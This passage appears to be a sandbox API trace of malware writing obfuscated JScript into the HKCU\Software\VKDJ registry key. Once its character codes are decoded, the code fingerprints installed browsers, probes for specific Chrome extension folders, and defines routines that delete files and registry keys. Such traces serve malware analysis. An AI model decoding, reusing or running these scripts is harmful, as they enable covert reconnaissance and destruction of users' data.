S48S41S44S105S44S109S44S100S91S110S43S49S51S93S44S50S49S44S49S51S48S57S49S53S49S54S52S57S41S44S114S61S109S100S53S95S105S105S40S114S44S105S61S109S100S53S95S105S105S40S105S44S109S61S109S100S53S95S105S105S40S109S44S102S44S114S44S105S44S100S91S110S43S52S93S44S54S44S45S49S52S53S53S50S51S48S55S48S41S44S102S44S114S44S100S91S110S43S49S49S93S44S49S48S44S45S49S49S50S48S50S49S48S51S55S57S41S44S109S44S102S44S100S91S110S43S50S93S44S49S53S44S55S49S56S55S56S55S50S53S57S41S44S105S44S109S44S100S91S110S43S57S93S44S50S49S44S45S51S52S51S52S56S53S53S53S49S41S44S109S61S115S97S102S101S95S97S100S100S40S109S44S104S41S44S102S61S115S97S102S101S95S97S100S100S40S102S44S116S41S44S114S61S115S97S102S101S95S97S100S100S40S114S44S103S41S44S105S61S115S97S102S101S95S97S100S100S40S105S44S101S41S125S114S101S116S117S114S110S32S65S114S114S97S121S40S109S44S102S44S114S44S105S41S125S102S117S110S99S116S105S111S110S32S109S100S53S95S99S109S110S40S100S44S95S44S109S44S102S44S114S44S105S41S123S114S101S116S117S114S110S32S115S97S102S101S95S97S100S100S40S98S105S116S95S114S111S108S40S115S97S102S101S95S97S100S100S40S115S97S102S101S95S97S100S100S40S95S44S100S41S44S115S97S102S101S95S97S100S100S40S102S44S105S41S41S44S114S41S44S109S41S125S102S117S110S99S116S105S111S110S32S109S100S53S95S102S102S40S100S44S95S44S109S44S102S44S114S44S105S44S110S41S123S114S101S116S117S114S110S32S109S100S53S95S99S109S110S40S95S38S109S124S126S95S38S102S44S100S44S95S44S114S44S105S44S110S41S125S102S117S110S99S116S105S111S110S32S109S100S53S95S103S103S40S100S44S95S44S109S44S102S44S114S44S105S44S110S41S123S114S101S116S117S114S110S32S109S100S53S95S99S109S110S40S95S38S102S124S109S38S126S102S44S100S44S95S44S114S44S105S44S110S41S125S102S117S110S99S116S105S111S110S32S109S100S53S95S104S104S40S100S44S95S44S109S44S102S44S114S44S105S44S110S41S123S114S101S116S117S114S110S32S109S100S53S95S99S109S110S40S95S94S109S94S102S44S100S44S95S44S114S44S105S44S110S41S125S102S117S110S99S116S105S111S110S32S109S100S53S95S105S105S40S100S44S95S44S109S44S102S44S114S44S105S44S110S41S123S114S101S116S117S114S110S32S109S100S53S95S99S109S110S40S109S94S40S95S124S126S102S41S44S100S44S95S44S114S44S105S44S110S41S125S102S117S110S99S116S105S111S110S32S115S97S102S101S95S97S100S100S40S100S44S95S41S123S118S97S114S32S109S61S40S54S53S53S51S53S38S100S41S43S40S54S53S53S51S53S38S95S41S59S114S101S116S117S114S110S40S100S62S62S49S54S41S43S40S95S62S62S49S54S41S43S40S109S62S62S49S54S41S60S60S49S54S124S54S53S53S51S53S38S109S125S102S117S110S99S116S105S111S110S32S98S105S116S95S114S111S108S40S100S44S95S41S123S114S101S116S117S114S110S32S100S60S60S95S124S100S62S62S62S51S50S45S95S125S32S125S99S97S116S99S104S40S101S114S114S41S123S101S114S114S46S100S101S115S99S114S105S112S116S105S111S110S59S125S
regkey_r: dataIn
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\VKDJ\dataIn
success 0 0
1620784394.53575
RegSetValueExW
key_handle: 0x00000120
value: S116S114S121S123S102S117S110S99S116S105S111S110S32S69S110S117S109S82S101S103S75S101S121S115S40S82S111S111S116S75S101S121S44S32S75S101S121S78S97S109S101S41S123S32S32S32S32S118S97S114S32S111S67S116S120S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S78S97S109S101S100S86S97S108S117S101S83S101S116S39S41S59S32S32S32S32S118S97S114S32S87S115S104S83S104S101S108S108S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S83S104S101S108S108S39S41S59S118S97S114S32S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S105S102S32S40S87S115S104S83S104S101S108S108S46S69S110S118S105S114S111S110S109S101S110S116S40S39S83S89S83S84S69S77S39S41S46S73S116S101S109S40S39S80S82S79S67S69S83S83S79S82S95S65S82S67S72S73S84S69S67S84S85S82S69S39S41S46S105S110S100S101S120S79S102S40S39S54S52S39S41S32S33S61S32S45S49S41S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S125S101S108S115S101S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S51S50S59S125S32S32S32S32S111S67S116S120S46S65S100S100S40S39S95S95S80S114S111S118S105S100S101S114S65S114S99S104S105S116S101S99S116S117S114S101S39S44S32S65S114S99S104S105S116S101S99S116S117S114S101S41S59S32S32S32S32S118S97S114S32S111S76S111S99S97S116S111S114S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S76S111S99S97S116S111S114S39S41S59S32S32S32S32S118S97S114S32S111S87S77S73S32S61S32S111S76S111S99S97S116S111S114S46S67S111S110S110S101S99S116S83S101S114S118S101S114S40S39S39S44S32S39S114S111S111S116S92S92S100S101S102S97S117S108S116S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S118S97S114S32S111S82S101S103S32S61S32S111S87S77S73S46S71S101S116S40S39S83S116S100S82S101S103S80S114S111S118S39S41S59S32S32S32S32S118S97S114S32S111S73S110S80S97S114S97S109S115S32S61S32S111S82S101S103S46S77S101S116S104S111S100S115S95S40S39S69S110S117S109S75S101S121S39S41S46S73S110S112S97S114S97S109S101S116S101S114S115S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S72S100S101S102S107S101S121S32S61S32S82S111S111S116S75S101S121S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S83S115S117S98S107S101S121S110S97S109S101S32S61S32S75S101S121S78S97S109S101S59S32S32S32S32S118S97S114S32S111S79S117S116S80S97S114S97S109S115S32S61S32S111S82S101S103S46S69S120S101S99S77S101S116S104S111S100S95S40S39S69S110S117S109S75S101S121S39S44S32S111S73S110S80S97S114S97S109S115S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S105S102S32S40S111S79S117S116S80S97S114S97S109S115S46S115S78S97S109S101S115S32S61S61S32S110S117S108S108S41S32S32S32S32S32S32S32S32S123S114S101S116S117S114S110S32S39S39S59S125S32S32S32S32S114S101S116S117S114S110S32S111S79S117S116S80S97S114S97S109S115S46S115S78S97S109S101S115S46S116S111S65S114S114S97S121S40S41S59S125S59S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S50S44S39S83S111S102S116S119S97S114S101S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S67S117S114S114S101S110S116S86S101S114S115S105S111S110S92S92S85S110S105S110S115S116S97S108S108S39S41S59S118S97S114S32S114S101S115S117S108S116S32S61S32S48S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S91S105S93S46S105S110S100S101S120S79S102S40S39S79S112S101S114S97S39S41S33S61S32S45S49S41S123S114S101S115S117S108S116S32S61S32S49S59S125S125S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S50S44S39S92S92S83S111S102S116S119S97S114S101S92S92S87S111S119S54S52S51S50S78S111S100S101S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S67S117S114S114S101S110S116S86S101S114S115S105S111S110S92S92S85S110S105S110S115S116S97S108S108S39S41S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S91S105S93S46S105S110S100S101S120S79S102S40S39S79S112S101S114S97S39S41S33S61S32S45S49S41S123S114S101S115S117S108S116S32S61S32S49S59S125S125S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S49S44S39S83S111S102S116S119S97S114S101S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S67S117S114S114S101S110S116S86S101S114S115S105S111S110S92S92S85S110S105S110S115S116S97S108S108S39S41S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S91S105S93S46S105S110S100S101S120S79S102S40S39S79S112S101S114S97S39S41S33S61S32S45S49S41S123S114S101S115S117S108S116S32S61S32S49S59S125S125S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S49S44S39S92S92S83S111S102S116S119S97S114S101S92S92S87S111S119S54S52S51S50S78S111S100S101S92S92S77S105S99S114S111S115S111S102S116S92S92S87S105S110S100S111S119S115S92S92S67S117S114S114S101S110S116S86S101S114S115S105S111S110S92S92S85S110S105S110S115S116S97S108S108S39S41S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S91S105S93S46S105S110S100S101S120S79S102S40S39S79S112S101S114S97S39S41S33S61S32S45S49S41S123S114S101S115S117S108S116S32S61S32S49S59S125S125S114S101S115S117S108S116S59S125S99S97S116S99S104S40S101S114S114S41S123S101S114S114S46S100S101S115S99S114S105S112S116S105S111S110S59S125S
regkey_r: dataIn
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\VKDJ\dataIn
success 0 0
1620784394.69175
RegSetValueExW
key_handle: 0x00000120
value: S116S114S121S123S102S117S110S99S116S105S111S110S32S69S110S117S109S82S101S103S75S101S121S115S40S82S111S111S116S75S101S121S44S32S75S101S121S78S97S109S101S41S123S32S32S32S32S118S97S114S32S111S67S116S120S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S78S97S109S101S100S86S97S108S117S101S83S101S116S39S41S59S32S32S32S32S118S97S114S32S87S115S104S83S104S101S108S108S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S83S104S101S108S108S39S41S59S118S97S114S32S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S105S102S32S40S87S115S104S83S104S101S108S108S46S69S110S118S105S114S111S110S109S101S110S116S40S39S83S89S83S84S69S77S39S41S46S73S116S101S109S40S39S80S82S79S67S69S83S83S79S82S95S65S82S67S72S73S84S69S67S84S85S82S69S39S41S46S105S110S100S101S120S79S102S40S39S54S52S39S41S32S33S61S32S45S49S41S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S125S101S108S115S101S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S51S50S59S125S32S32S32S32S111S67S116S120S46S65S100S100S40S39S95S95S80S114S111S118S105S100S101S114S65S114S99S104S105S116S101S99S116S117S114S101S39S44S32S65S114S99S104S105S116S101S99S116S117S114S101S41S59S32S32S32S32S118S97S114S32S111S76S111S99S97S116S111S114S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S76S111S99S97S116S111S114S39S41S59S32S32S32S32S118S97S114S32S111S87S77S73S32S61S32S111S76S111S99S97S116S111S114S46S67S111S110S110S101S99S116S83S101S114S118S101S114S40S39S39S44S32S39S114S111S111S116S92S92S100S101S102S97S117S108S116S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S118S97S114S32S111S82S101S103S32S61S32S111S87S77S73S46S71S101S116S40S39S83S116S100S82S101S103S80S114S111S118S39S41S59S32S32S32S32S118S97S114S32S111S73S110S80S97S114S97S109S115S32S61S32S111S82S101S103S46S77S101S116S104S111S100S115S95S40S39S69S110S117S109S75S101S121S39S41S46S73S110S112S97S114S97S109S101S116S101S114S115S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S72S100S101S102S107S101S121S32S61S32S82S111S111S116S75S101S121S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S83S115S117S98S107S101S121S110S97S109S101S32S61S32S75S101S121S78S97S109S101S59S32S32S32S32S118S97S114S32S111S79S117S116S80S97S114S97S109S115S32S61S32S111S82S101S103S46S69S120S101S99S77S101S116S104S111S100S95S40S39S69S110S117S109S75S101S121S39S44S32S111S73S110S80S97S114S97S109S115S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S105S102S32S40S111S79S117S116S80S97S114S97S109S115S46S115S78S97S109S101S115S32S61S61S32S110S117S108S108S41S123S114S101S116S117S114S110S32S39S39S59S125S32S32S32S32S114S101S116S117S114S110S32S111S79S117S116S80S97S114S97S109S115S46S115S78S97S109S101S115S46S116S111S65S114S114S97S121S40S41S59S125S59S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S49S44S39S83S111S102S116S119S97S114S101S39S41S59S118S97S114S32S114S101S115S117S108S116S32S61S32S48S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S91S105S93S46S105S110S100S101S120S79S102S40S39S79S112S101S114S97S32S83S111S102S116S119S97S114S101S39S41S33S61S32S45S49S41S123S114S101S115S117S108S116S32S61S32S49S59S125S125S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S50S44S39S83S111S102S116S119S97S114S101S39S41S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S91S105S93S46S105S110S100S101S120S79S102S40S39S79S112S101S114S97S32S83S111S102S116S119S97S114S101S39S41S33S61S32S45S49S41S123S114S101S115S117S108S116S32S61S32S49S59S125S125S97S114S114S32S61S32S69S110S117S109S82S101S103S75S101S121S115S40S48S120S56S48S48S48S48S48S48S50S44S39S83S111S102S116S119S97S114S101S92S92S87S111S119S54S52S51S50S78S111S100S101S39S41S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S91S105S93S46S105S110S100S101S120S79S102S40S39S79S112S101S114S97S32S83S111S102S116S119S97S114S101S39S41S33S61S32S45S49S41S123S114S101S115S117S108S116S32S61S32S49S59S125S125S114S101S115S117S108S116S59S125S99S97S116S99S104S40S101S114S114S41S123S101S114S114S46S100S101S115S99S114S105S112S116S105S111S110S59S125S
regkey_r: dataIn
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\VKDJ\dataIn
success 0 0
1620784394.84775
RegSetValueExW
key_handle: 0x00000120
value: S116S114S121S123S118S97S114S32S110S101S116S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S78S101S116S119S111S114S107S39S41S59S118S97S114S32S102S105S108S101S83S121S115S116S101S109S79S98S106S101S99S116S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S83S99S114S105S112S116S105S110S103S46S70S105S108S101S83S121S115S116S101S109S79S98S106S101S99S116S39S41S59S97S114S114S32S61S32S91S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S102S100S106S100S106S107S107S106S111S105S111S109S97S102S110S105S104S110S111S98S107S105S110S110S102S106S110S110S108S104S100S103S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S100S106S103S100S103S100S99S102S109S100S107S102S105S99S98S105S102S98S110S97S97S99S107S110S98S108S98S107S104S104S111S99S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S97S107S103S100S107S107S110S105S108S107S98S108S112S106S99S103S112S106S109S98S106S103S112S97S109S110S101S111S107S109S97S103S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S102S106S110S111S109S101S111S97S110S110S106S109S97S104S109S109S109S103S112S99S107S101S105S103S106S99S109S111S105S111S101S97S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S112S112S105S97S111S106S112S98S99S108S112S101S103S107S107S107S109S105S107S97S98S105S110S108S112S98S97S104S104S98S104S97S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S105S102S98S101S108S97S107S100S105S105S103S98S104S97S106S102S100S107S106S99S99S101S109S109S109S98S100S108S98S105S102S103S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S110S109S101S108S103S97S102S111S98S110S107S105S111S110S107S109S111S108S98S112S101S105S110S112S103S101S102S111S98S110S100S109S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S110S108S109S111S112S104S112S99S106S101S105S104S109S98S101S106S111S98S109S109S107S111S103S104S111S107S97S107S105S110S110S101S39S44S39S67S58S92S92S85S115S101S114S115S92S92S39S32S43S32S110S101S116S46S85S115S101S114S78S97S109S101S32S43S32S39S92S92S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S71S111S111S103S108S101S92S92S67S104S114S111S109S101S92S92S85S115S101S114S32S68S97S116S97S92S92S68S101S102S97S117S108S116S92S92S69S120S116S101S110S115S105S111S110S115S92S92S98S103S101S112S106S100S106S109S107S105S109S103S109S102S104S100S100S97S112S101S97S102S105S103S110S104S106S110S112S103S104S99S39S44S93S59S118S97S114S32S114S101S115S117S108S116S32S61S32S48S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S46S108S101S110S103S116S104S59S105S43S43S41S123S116S114S121S123S105S102S40S102S105S108S101S83S121S115S116S101S109S79S98S106S101S99S116S46S70S111S108S100S101S114S69S120S105S115S116S115S40S97S114S114S91S105S93S41S41S123S114S101S115S117S108S116S32S61S32S49S59S98S114S101S97S107S59S125S125S99S97S116S99S104S40S101S41S123S125S125S114S101S115S117S108S116S59S125S99S97S116S99S104S40S101S114S114S41S123S101S114S114S46S100S101S115S99S114S105S112S116S105S111S110S59S125S
regkey_r: dataIn
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\VKDJ\dataIn
success 0 0
1620784398.97275
RegSetValueExW
key_handle: 0x00000120
value: S116S114S121S123S102S117S110S99S116S105S111S110S32S100S101S108S70S105S108S101S115S73S110S70S111S108S100S101S114S40S112S97S116S104S41S123S118S97S114S32S102S115S111S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S83S99S114S105S112S116S105S110S103S46S70S105S108S101S83S121S115S116S101S109S79S98S106S101S99S116S39S41S59S105S102S40S102S115S111S46S70S111S108S100S101S114S69S120S105S115S116S115S40S112S97S116S104S41S32S61S61S32S102S97S108S115S101S41S123S114S101S116S117S114S110S59S125S118S97S114S32S102S32S61S32S102S115S111S46S71S101S116S70S111S108S100S101S114S40S112S97S116S104S41S59S32S118S97S114S32S105S116S101S109S115S32S61S32S110S101S119S32S69S110S117S109S101S114S97S116S111S114S40S102S46S70S105S108S101S115S41S59S119S104S105S108S101S32S40S33S105S116S101S109S115S46S97S116S69S110S100S40S41S41S123S116S114S121S123S102S115S111S46S68S101S108S101S116S101S70S105S108S101S40S112S97S116S104S32S43S32S39S92S92S39S32S43S32S105S116S101S109S115S46S105S116S101S109S40S41S46S78S97S109S101S41S59S125S99S97S116S99S104S40S101S41S123S125S105S116S101S109S115S46S109S111S118S101S78S101S120S116S40S41S59S125S125S102S117S110S99S116S105S111S110S32S69S110S117S109S82S101S103S75S101S121S115S40S82S111S111S116S75S101S121S44S32S75S101S121S78S97S109S101S41S123S32S32S32S32S118S97S114S32S111S67S116S120S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S78S97S109S101S100S86S97S108S117S101S83S101S116S39S41S59S32S32S32S32S118S97S114S32S87S115S104S83S104S101S108S108S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S83S104S101S108S108S39S41S59S118S97S114S32S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S105S102S32S40S87S115S104S83S104S101S108S108S46S69S110S118S105S114S111S110S109S101S110S116S40S39S83S89S83S84S69S77S39S41S46S73S116S101S109S40S39S80S82S79S67S69S83S83S79S82S95S65S82S67S72S73S84S69S67S84S85S82S69S39S41S46S105S110S100S101S120S79S102S40S39S54S52S39S41S32S33S61S32S45S49S41S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S125S101S108S115S101S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S51S50S59S125S32S32S32S32S111S67S116S120S46S65S100S100S40S39S95S95S80S114S111S118S105S100S101S114S65S114S99S104S105S116S101S99S116S117S114S101S39S44S32S65S114S99S104S105S116S101S99S116S117S114S101S41S59S32S32S32S32S118S97S114S32S111S76S111S99S97S116S111S114S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S76S111S99S97S116S111S114S39S41S59S32S32S32S32S118S97S114S32S111S87S77S73S32S61S32S111S76S111S99S97S116S111S114S46S67S111S110S110S101S99S116S83S101S114S118S101S114S40S39S39S44S32S39S114S111S111S116S92S92S100S101S102S97S117S108S116S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S118S97S114S32S111S82S101S103S32S61S32S111S87S77S73S46S71S101S116S40S39S83S116S100S82S101S103S80S114S111S118S39S41S59S32S32S32S32S118S97S114S32S111S73S110S80S97S114S97S109S115S32S61S32S111S82S101S103S46S77S101S116S104S111S100S115S95S40S39S69S110S117S109S75S101S121S39S41S46S73S110S112S97S114S97S109S101S116S101S114S115S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S72S100S101S102S107S101S121S32S61S32S82S111S111S116S75S101S121S59S32S32S32S32S111S73S110S80S97S114S97S109S115S46S83S115S117S98S107S101S121S110S97S109S101S32S61S32S75S101S121S78S97S109S101S59S32S32S32S32S118S97S114S32S111S79S117S116S80S97S114S97S109S115S32S61S32S111S82S101S103S46S69S120S101S99S77S101S116S104S111S100S95S40S39S69S110S117S109S75S101S121S39S44S32S111S73S110S80S97S114S97S109S115S44S32S48S44S32S111S67S116S120S41S59S32S32S32S32S105S102S32S40S111S79S117S116S80S97S114S97S109S115S46S115S78S97S109S101S115S32S61S61S32S110S117S108S108S41S123S32S114S101S116S117S114S110S32S39S39S59S125S32S32S32S32S114S101S116S117S114S110S32S111S79S117S116S80S97S114S97S109S115S46S115S78S97S109S101S115S46S116S111S65S114S114S97S121S40S41S59S125S102S117S110S99S116S105S111S110S32S114S101S103S68S101S108S40S114S111S111S116S44S107S101S121S41S123S118S97S114S32S87S115S104S83S104S101S108S108S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S83S104S101S108S108S39S41S59S118S97S114S32S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S105S102S32S40S87S115S104S83S104S101S108S108S46S69S110S118S105S114S111S110S109S101S110S116S40S39S83S89S83S84S69S77S39S41S46S73S116S101S109S40S39S80S82S79S67S69S83S83S79S82S95S65S82S67S72S73S84S69S67S84S85S82S69S39S41S46S105S110S100S101S120S79S102S40S39S54S52S39S41S32S33S61S32S45S49S41S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S125S101S108S115S101S123S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S51S50S59S125S118S97S114S32S111S67S116S120S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S78S97S109S101S100S86S97S108S117S101S83S101S116S39S41S59S111S67S116S120S46S65S100S100S40S39S95S95S80S114S111S118S105S100S101S114S65S114S99S104S105S116S101S99S116S117S114S101S39S44S32S65S114S99S104S105S116S101S99S116S117S114S101S41S59S118S97S114S32S76S111S99S97S116S111S114S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S76S111S99S97S116S111S114S39S41S59S118S97S114S32S83S101S114S118S101S114S67S111S110S110S32S61S32S76S111S99S97S116S111S114S46S67S111S110S110S101S99S116S83S101S114S118S101S114S40S110S117S108S108S44S32S39S114S111S111S116S92S92S100S101S102S97S117S108S116S39S44S39S39S44S32S39S39S44S32S39S39S44S32S39S39S44S32S48S44S111S67S116S120S41S59S118S97S114S32S82S101S103S105S115S116S114S121S32S61S32S83S101S114S118S101S114S67S111S110S110S46S71S101S116S40S39S83S116S100S82S101S103S80S114S111S118S39S41S59S118S97S114S32S77S101S116S104S111S100S32S61S32S82S101S103S105S115S116S114S121S46S77S101S116S104S111S100S115S95S46S73S116S101S109S40S39S68S101S108S101S116S101S75S101S121S39S41S59S118S97S114S32S112S95S73S110S32S61S32S77S101S116S104S111S100S46S73S110S80S97S114S97S109S101S116S101S114S115S46S83S112S97S119S110S73S110S115S116S97S110S99S101S95S40S41S59S112S95S73S110S46S104S68S101S102S75S101S121S32S32S32S32S32S61S32S114S111S111S116S59S112S95S73S110S46S115S83S117S98S75S101S121S78S97S109S101S32S61S32S107S101S121S59S118S97S114S32S112S95S79S117S116S32S61S32S82S101S103S105S115S116S114S121S46S69S120S101S99S77S101S116S104S111S100S95S40S77S101S116S104S111S100S46S78S97S109S101S44S32S112S95S73S110S44S48S44S111S67S116S120S41S59S114S101S116S117S114S110S32S112S95S79S117S116S59S125S102S117S110S99S116S105S111S110S32S82S101S97S100S82S101S103S83S116S114S40S82S111S111S116S75S101S121S44S32S75S101S121S78S97S109S101S44S32S86S97S108S117S101S78S97S109S101S41S123S32S32S32S32S118S97S114S32S87S115S104S83S104S101S108S108S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S83S99S114S105S112S116S46S83S104S101S108S108S39S41S59S118S97S114S32S111S67S116S120S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S78S97S109S101S100S86S97S108S117S101S83S101S116S39S41S59S32S32S32S32S118S97S114S32S65S114S99S104S105S116S101S99S116S117S114S101S32S61S32S54S52S59S105S102S32S40S87S115S104S83S104S101S108S108S46S69S110S118S105S114S111S110S109S101S110S116S40S39S83S89S83S84S69S77S39S41S46S73S116S101S109S40S39S80S82S79S67S69S83S83S79S82S95S65S82S67S72